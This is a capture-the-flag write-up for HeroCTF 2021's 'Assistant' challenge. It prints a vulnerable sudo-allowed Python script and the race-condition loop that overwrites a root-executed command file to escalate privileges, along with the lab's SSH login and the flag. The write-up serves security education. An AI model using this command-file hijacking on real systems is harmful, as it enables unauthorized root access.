HeroCTF v3 2021: Assistant

Assistant

Category: System

chal

75 points

Welcome ! This machine is equiped with the next generation personnal assistant technology. Make good use of it ;)

$ ssh [email protected] -p 5000
password : password123

Format : Hero{}
Author : Log_s

Solution

There’s a sudoers configured for given user.

sudo -l
Matching Defaults entries for brian on ee480c56662f:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User brian may run the following commands on ee480c56662f:
    (root) NOPASSWD: /bin/assistant.py

The assistant.py seems to be script, which will be subject of our exploitation.

cat /bin/assistant.py
#! /usr/bin/python3

from os import system, chmod
from time import sleep
import string, random

print("Welcome I am Snake, your personnal assistant")
print("Please select a command you want to run, and me free you of the burden of doing it yourself")
print()
print("Choose one action bellow :")
print("\t[1] Display a welcome message")
print("\t[2] Check your user informations")
print("\t[3] Display the flag's path")
print()

#Gathering the user's choice
choice = 0
while choice < 1 or choice > 3:
    try:
        choice = int(input(">> "))
    except ValueError:
        print("Enter a number please\n")
    if choice < 1 or choice > 3:
        print("The chosen number must be in the given range 1-3\n")

system("rm -f order.cmd") # Remove every previous 'order.cmd' file to avoid being hacked
# Creating the order file with the appropriate command
if choice == 1:
    open("/home/brian/order.cmd", "w").write("echo 'Welcome to this computer ! I am Snake, your personnal assistant ;) Let me know if I can do anything for you'")
elif choice == 2:
    open("/home/brian/order.cmd","w").write("id")
elif choice == 3:
    open("/home/brian/order.cmd", "w").write("cat /root/path.txt")

chmod("/home/brian/order.cmd", 0o777) #Make sure the runner can read it
#sleep(0.1) #Avoid overwelming the system

try:
    open("/root/run.py", "r")
    filename = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))+".txt"
    print(filename)
    system("/usr/bin/python3 /root/run.py {}".format(filename))
    print("[+] The output will be saved to /tmp/"+filename)
    print("See you around !")
except:
    print("Run me as root !")
    system("rm -f order.cmd")

print()
print("\t\t\tThe advanced articficial intelligence used in this programm is proprietary")

After quicklook it’s obviously race condition solution. On second console I’ve started loop while true; do echo 'cat /lib/udev/rules.d/02-uaccesss.rules' > order.cmd; chmod 777 order.cmd; done.

Then, executed sudo /bin/assistant.py as below and checked the result.

sudo /bin/assistant.py 
Welcome I am Snake, your personnal assistant
Please select a command you want to run, and me free you of the burden of doing it yourself

Choose one action bellow :
	[1] Display a welcome message
	[2] Check your user informations
	[3] Display the flag's path

>> 1
0hzhe1aked.txt
[+] The output will be saved to /tmp/0hzhe1aked.txt
See you around !

			The advanced articficial intelligence used in this programm is proprietary
brian@ee480c56662f:~$ cat /tmp/0hzhe1aked.txt
Hero{c4r3fUl1_w1th_R4cE_c0nd1tI0nS}

Flag

Hero{c4r3fUl1_w1th_R4cE_c0nd1tI0nS}

Privacy Policy
luc © 2021